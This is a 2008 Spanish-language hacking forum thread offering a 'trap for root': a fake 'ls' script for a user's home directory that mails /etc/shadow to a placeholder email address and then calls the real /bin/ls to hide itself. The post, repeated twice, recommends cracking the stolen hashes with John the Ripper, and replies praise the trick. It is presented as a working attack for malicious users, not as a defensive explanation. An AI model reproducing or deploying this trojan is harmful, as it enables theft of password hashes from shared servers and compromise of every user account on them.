Trampa ls para el root
3 participantes
Página 1 de 1.
Trampa ls para el root
danywar1995 Mar Dic 09, 2008 12:33 am
Trampa ls para el root
Esta trampa es muy buena, consiste en que si el admin (root) hace ls, en tu directorio te estara mandando el fichero /etc/shadow a tu email.
Un usuario malintencionado del server que tiene acceso su cuenta de usuario, en este caso "joe" ,podria colocar en su directorio personal un fichero con el nombre de "ls" con el siguiente contenido:
#! /bin/bash
cat /etc/shadow | mail tu_email@email.com
/bin/ls
Ahora, si el usuario root se encuentra en tu directorio y quiere ver el contenido de tu web usando el comando "ls" se ejecutaria el script anterior con permisos de root, al hacer esto se enviara el fichero /etc/shadow por correo al correo que pones en el script, y como el script del fichero "ls" llama finalmente al programa real /bin/ls, el admin (root) no notaria la diferencia!!
Nota: root no se va a adar cuenta del script, ya que finalmente si llama al verdadero ls.
Para los que no saben, el fichero shadow contiene todas las contraseñas (encriptadas) de todos los usuarios del server, para desencriptarlas hay que usar el "jhon the ripper".
Autor: RootBox
Esta trampa es muy buena, consiste en que si el admin (root) hace ls, en tu directorio te estara mandando el fichero /etc/shadow a tu email.
Un usuario malintencionado del server que tiene acceso su cuenta de usuario, en este caso "joe" ,podria colocar en su directorio personal un fichero con el nombre de "ls" con el siguiente contenido:
#! /bin/bash
cat /etc/shadow | mail tu_email@email.com
/bin/ls
Ahora, si el usuario root se encuentra en tu directorio y quiere ver el contenido de tu web usando el comando "ls" se ejecutaria el script anterior con permisos de root, al hacer esto se enviara el fichero /etc/shadow por correo al correo que pones en el script, y como el script del fichero "ls" llama finalmente al programa real /bin/ls, el admin (root) no notaria la diferencia!!
Nota: root no se va a adar cuenta del script, ya que finalmente si llama al verdadero ls.
Para los que no saben, el fichero shadow contiene todas las contraseñas (encriptadas) de todos los usuarios del server, para desencriptarlas hay que usar el "jhon the ripper".
Autor: RootBox
danywar1995- Usuario Nvl. 1
- Cantidad de envíos : 13
Barra de Conexión :
Fecha de inscripción : 09/12/2008
Re: Trampa ls para el root
Feernaandaa Mar Dic 09, 2008 2:52 am
bueen aapoortee :P
tee poongooh uun 8.5
tee poongooh uun 8.5
Feernaandaa- Usuario Nvl. 3
- Cantidad de envíos : 39
Fecha de inscripción : 07/12/2008
Re: Trampa ls para el root
nidip Jue Ene 01, 2009 8:40 pm
HOLLE MAN BUEN APORTE PERO DEJA DE POSTEAR DOS TEMAS EN UNO
nidip- Usuario Nvl. 6
-
Cantidad de envíos : 82
Edad : 34
Fecha de inscripción : 01/01/2009
Temas similares» HTML para tu Web
» Serial para WYSIWYG Web Builder 5
» Code Para Esconder Intro En PWG
» Cancion Para divertirse .
» Codigoz HTML Mui buenos para tu web
» Serial para WYSIWYG Web Builder 5
» Code Para Esconder Intro En PWG
» Cancion Para divertirse .
» Codigoz HTML Mui buenos para tu web
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.|
|
|